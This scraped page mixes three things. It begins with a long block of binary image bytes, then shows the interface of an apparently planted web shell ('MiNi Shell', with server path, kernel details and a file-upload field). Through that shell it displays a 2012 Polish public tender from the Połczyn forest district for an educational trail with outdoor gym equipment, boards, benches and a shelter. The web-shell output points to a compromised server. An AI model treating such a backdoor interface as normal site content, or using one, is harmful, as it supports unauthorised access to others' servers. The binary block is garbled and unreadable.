JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121109/442016-N-2012.html

<p class="kh_header"><b>Połczyn-Zdrój: Budowa ścieżki edukacyjnej Dbając o figurę poznaję NATURĘ jako zadanie inwestycyjne dofinansowane ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Szczecinie</b><br>
<b>Numer ogłoszenia: 442016 - 2012; data zamieszczenia: 09.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Połczyn , ul. 15 Grudnia 12, 78-320 Połczyn-Zdrój, woj. zachodniopomorskie, tel. 094 3662230, faks 094 3662230.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rdlp.szczecinek.pl/polczyn</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_polczyn/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PGL Lasy Państwowe Nadleśnictwo Połczyn.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ścieżki edukacyjnej Dbając o figurę poznaję NATURĘ jako zadanie inwestycyjne dofinansowane ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

A.	Zakup metalowych urządzeń sportowych przeznaczonych do ćwiczeń na wolnym powietrzu, ich transport oraz montaż na terenie SM Tadeuszówka ul. Sobieskiego 13 w Połczynie Zdroju oraz dwóch odrębnych lokalizacjach wskazanych przez zamawiającego zgodnie z załącznikiem nr 2 do SIWZ





Przy SM Tadeuszówka zostaną zainstalowane:
- biegacz + orbitrek				szt. 1	
- wyciąg górny + wyciskanie siedząc	szt.1
- prasa nożna + wioślarz			szt. 1
- twister- wahadlo				szt. 1
- podciąg nóg					szt. 1

W lokalizacji nr 2 wskazanej przez Zamawiającego zamontowany zostanie:
- biegacz + orbitrek				szt.1

W lokalizacji nr 3 wskazanej przez Zamawiającego zamontowany zostanie:
- prasa nożna + wioślarz			szt.1

W każdej z lokalizacji zamieszczona zostanie tablica z regulaminem korzystania z siłowni, której dostawa i montaż leży po stronie Wykonawcy.

Kolejność wykonywania prac przy montażu siłowni zewnętrznych

1. Wyznaczyć i wyrównać teren pod urządzenie, 
2. Wykopać dół pod fundament prefabrykowany o głębokości 35x100x100cm dla pylona, fundament pojedynczy dla urządzeń sprawnościowych o wymiarach 55x50x50cm, (dopuszcza się wykonanie fundamentu na miejscu zgodnie z PN), 
3. Ułożyć fundament prefabrykowany 30 cm pod powierzchnią ziemi, wypoziomować, 
4. Nawiercić otwory w betonie do zamocowania kotew rozporowych, 
5. Zamocować stalowe kotwy rozporowe (pręt   16 mm), upewnić się, że wszystkie dobrze są zamocowane w betonie, 
6. Przymocować urządzenie zachowując pion pylona, 
7. Montaż urządzeń sprawnościowych do fundamentu i pylona, 
8. Wypoziomować i sprawdzić ich stabilności,  
9. Zasypać fundament pylona 10 cm, a fundament pojedynczy 30 cm warstwą ziemi, 
10. Rekultywacja terenu,
11. Uprzątnięcie terenu po wykonanych pracach


Załącznik Nr 2 stanowi szczegółowy opis wymaganych urządzeń będących wyposażeniem siłowni zewnętrznych. 

Wszystkie dostarczone i zamontowane urządzenia do siłowni zewnętrznych winny posiadać stosowane certyfikaty zgodności z normami PN-EN 1176 oraz PN-EN 957. Zamawiający żąda załączenia wszystkich ww. dokumentów do oferty.
Wszystkie elementy muszą spełniać wymogi bezpieczeństwa i ergonomii oraz wymagania określone w przepisach BHP oraz pozostałych przepisach prawa. 
Urządzenia winny być wykonane ze stali nierdzewnej, malowane proszkowo na kolor brązowo-zielony.
 Elementy narażone na zużycie typu stopki, siedziska winny być wykonane ze stali nierdzewnej odpornej na warunki atmosferyczne oraz zadrapania. 
Wszystkie urządzenia winny posiadać ograniczniki, które uniemożliwiają nadmierne wychylenie elementów wahających się powyżej 50 stopni, co ma na celu zapobiegać niebezpiecznym uderzeniom. Elementy swobodnie opadające w prasach w celu zredukowania siły zderzenia elementów winny mieć zastosowane amortyzatory.
Każde urządzenie winno być urządzeniem modułowym tj. pozwalającym na zastosowanie dowolnej konfiguracji dwóch stanowisk do ćwiczeń po obu stronach pylona. 
Każde urządzenie winno być wyposażone w tablice znamionową zamontowaną w centralnej części pylonu, z funkcjami i instrukcją do ćwiczeń.
Wykonawca jest odpowiedzialny za prowadzenie prac zgodnie z wszelkimi niezbędnymi przepisami, obowiązującymi normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy. Jednocześnie winien przestrzegać warunków umowy oraz odpowiada za jakość zastosowanych materiałów i wykonywanych robót i za ich zgodność z dokumentacją.
Wykonawca winien przedłożyć Zamawiającemu rysunki, zdjęcia bądź wizualizację zaproponowanych urządzeń do siłowni zewnętrznych określonych w ofercie wraz z opisem potwierdzające spełnianie wymagań technicznych określonych przez Zamawiającego w załączniku Nr 3 . 
Zamawiający wymaga zamontowania Regulaminu korzystania z siłowni zewnętrznych - 3 szt. na tablicach drewnianych montowanych na kotwach do fundamentu betonowego.
Wykonawca udziela minimum 24 miesięcy gwarancji na wszystkie dostarczone urządzenia licząc od dnia protokolarnego ich odbioru.
Po zakończonych pracach Wykonawca winien uporządkować teren i zutylizować wszelkie wytworzone odpady.


B.	Dostawa wraz z montażem (elementów edukacyjnej infrastruktury terenowej):

Tablice informacyjne - 15 szt. zgodnie z tematyką stanowiącą załącznik nr 4 do SIWZ.

Tablice informacyjne ustawione na trasie ścieżki dydaktycznej będą prezentowały wybrane gatunki roślin i zwierząt objęte ścisłą i częściową ochroną, wybrane siedliska naturowe występujące na obszarze realizacji projektu oraz metody ochrony przyrody.
W ramach niniejszego zamówienia Wykonawcy zobowiązany jest do dostarczenia i montażu tablic zgodnie z tematyką stanowiącą załącznik nr 4. 
Wymiary tablic 100x135 cm zgodnie z Księgą Wizualizacji Lasów Państwowych.
Tablice wydrukowane na folii z 5 letnią gwarancją, dodatkowo powleczone laminatem UV z 5 letnią gwarancją. Nośnikiem głównym powinna być blacha ocynkowana.

Stelaże do tablic wykonane z drewna iglastego.
Dach dwuspadowy wykonany z sześciu desek montowanych na zakład 3 cm. Wymiary desek 15x2,5x200 cm.
Boczne części dachu wykończone ryglem o szerokości 8 cm. Oprawa tablicy wykonana z 4 desek z jednostronnym zewnętrznym oflisem. Grubość desek min 2,5 cm szerokość około 10-15 cm
Część tylna oprawy tablicy zabezpieczona w całości deską lub wodoodporną płytą. 
Stelaż zamontowany na słupach średnicy min. 12cm. 
Do słupów należy zamontować kotwy stalowe za pomocą śrub zamkowych. długość kotw 100 cm.
Stelaż na kotwach należy zamontować na fundamencie wykonanym z betonu B15

Po stronie Wykonawcy leży skład graficzny tablicy wraz z zapewnieniem materiału fotograficznego obrazującego opisywane zagadnienie. Projekty tablic należy wykonać w oparciu o licencjonowane fotografie i autoryzowane teksty. Wykonawca jest zobowiązany do  wskazania źródła pochodzenia fotografii celem ich weryfikacji przez Zamawiającego przed podpisaniem umowy.



8 kompletów miejsc spoczynkowych (komplet = stół, 2 ławki, kosz na śmieci, stojak na rowery) jako punkty edukacyjne na ścieżce. Ławki ustawione na terenie wybranych przystanków pozwolą na odpoczynek w czasie przejścia lub przejazdu rowerem ścieżką edukacyjną;

Ławostoły wykonane z półbali z drewna iglastego, na podkładach dębowych.
długość ławostołu 200 cm
szerokość blatu stołu 80 cm
szerokość siedzisk około 30 cm
grubość blatu i siedzisk  min 14 cm. 
Ławostoły na kotwach stalowych należy zamontować na fundamencie wykonanym z betonu  B15
 
Kosz o pojemności 160 litrów z zamykaną klapą uniemożliwiającą dostęp zwierzętom.

Stojak rowerowy wykonany z bala średnicy około 30-40 cm na sześć rowerów.


Słupki informacyjne z kierunkowskazem, o wymiarach ok. 20x30cm w ilości 50 sztuk jako oznakowanie przebiegu ścieżki. W ramach niniejszego zamówienia Wykonawcy zobowiązany jest do dostawy i montażu w miejscach wskazanych przez Zamawiającego słupków informacyjnych (kierunkowych).


C.	Budowa wiaty edukacyjnej:

powierzchnia zabudowy: do 25 m2,
powierzchnia użytkowa: do 25 m2,
wysokość całkowita: do 3,5 m,

Charakterystyka obiektu :
Wiatę drewnianą nieobudowaną projektuje się jako miejsce edukacyjne dla dzieci i młodzieży. Wiata wyposażona będzie w 2 ławostoły  których dostawa i montaż leżą po stronie Wykonawcy.

Ławostoły wykonane z półbali z drewna iglastego, na podkładach dębowych.
długość ławostołu 200 cm
szerokość blatu stołu 80 cm
szerokość siedzisk około 30 cm
grubość blatu i siedzisk  min 14 cm. 
Ławostoły na kotwach stalowych należy zamontować na fundamencie wykonanym z betonu  B15

Dane konstrukcyjno - materiałowe wiaty:
- fundamenty - pecki betonowe z betonu żwirowego klasy B-15 , które stanowią podstawę do mocowania słupów nośnych wiaty . (Wyceniając pozycję fundamenty należy uwzględnić środek pozwalający na prawidłowe wykonanie pecek betonowych w niskich temperaturach)

 - konstrukcja wiaty - na słupach drewnianych fi 25 cm mocowanych do pecek betonowych przy pomocy kotew z płaskownika o szerokości 4 cm zakotwiczonych w peckach betonowych i wyprowadzonych 30 cm ponad pecki. Połączenie słupa nośnego z kotwiami śrubami fi 10 mm 



- więźba dachowa - drewniana czterospadowa umocowana na płatwach 18 x 18 cm osadzonych na słupach nośnych wiaty . Krokwie drewniane 16 x 8 cm wypuszczone poza obrys budowli stanowią równocześnie okap. Krokwie wzmocnione jętkami 12 x 6 cm. Zwiatrowania stanowią zastrzały 16 x 8 cm zamocowane w płatwii i słupie nośnym. Konstrukcja dachu oszalowana deskami grub. 25 mm na styk . Pokrycie połaci dachowej stanowią gonty bitumiczne na podkładzie z papy. Wszystkie elementy drewniane należy zabezpieczyć przed szkodliwym działaniem warunków atmosferycznych oraz przeciw grzybom i owadom oraz przeciwpożarowo ( np. ogniochron, fobos-4 ) 

- posadzka - z kostki drewnianej zabezpieczyć przed szkodliwym działaniem warunków atmosferycznych oraz przeciw grzybom i owadom oraz przeciwpożarowo ( np. ogniochron, fobos-4 ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielania zamówień uzupełniających, polegających na powtórzeniu czynności zawartych w opisie przedmiotu zamówienia do 50% podstawowej wartości zamówienia w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy (od daty podpisania umowy).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.11.12.91-4, 37.41.00.00-5, 37.44.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Wykonawca jest zobowiązany do wniesienia wadium w wysokości 4 000,00 zł.
     (słownie: tysiąc złotych). 
2.  Wadium winno być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
pieniądzu, wyłącznie przelewem na rachunek bankowy w 
BGŻ Szczecinek Nr rachunku: 24 2030 0045 1110 0000 0033 0540
poręczeniach bankowych,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).
3.  Wadium musi obejmować cały okres związania ofertą.
4.  Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
5.  Wykonawca, który nie wniesie wadium w formie lub formach, o których mowa w 	pkt 2. zostanie wykluczony z postępowania.
6.  Zamawiający zwróci niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnienia postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
8.   Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.   Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizję bankową za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10. Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
odmówi podpisania umowy w sprawie niniejszego zamówienia na warunkach określonych w ofercie,
nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia. 
Warunek ten zostanie spełniony jeśli Wykonawca wykaże (na załączniku nr 6), że w okresie ostatnich pięciu lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności był krótszy - w tym okresie wykonali co najmniej  2 zadania związane z montażem urządzeń do siłowni zewnętrznych lub dostawę z montażem elementów małej architektury o  wartości 40 000 zł brutto na każde z zadań - potwierdzone referencjami o ich należytym wykonaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania  odpowiednim potencjałem osobowym, pozwalającym na wykonanie zamówienia.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia zawartego w formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia zawartego w formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ.
Ocena spełnienia warunków odbędzie się według formuły: spełnia /nie  spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający żąda ponadto złożenia wraz z ofertą oświadczenia i dokumentów potwierdzających, że oferowane urządzenia siłowe odpowiadają określonym przez niego wymaganiom. Do oferty należy załączyć:

- foldery, fotografie lub katalogi obrazujące poszczególne urządzenia

- kartę techniczną dla każdego urządzenia, pokazującą jego konstrukcję, wymiary i strefę ochroną wraz z nazwą producenta,

- oświadczenie, iż oferowane dostawy spełniają wszystkie wymagania materiałowo-techniczne zgodnie z załącznikiem nr 7 do SIWZ.

Z załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, że wykonawca spełnia wszystkie warunki zawarte w SIWZ.
Dokumenty sporządzone  w języku obcym należy złożyć wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.
Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
 Niespełnienie chociażby jednego warunku zawartego  w SIWZ  lub brak jednego dokumentu
określonego w SIWZ skutkować będzie wykluczeniem Wykonawcy z postępowania.
       Ocena spełnienia warunków odbędzie się według formuły: spełnia /nie spełnia.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_polczyn/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Połczyn ul. 15 Grudnia 12, 
 Połczyn-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 12:00, miejsce: Sekretariat - Nadleśnictwo Połczyn
ul. 15 Grudnia 12  Połczyn-Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com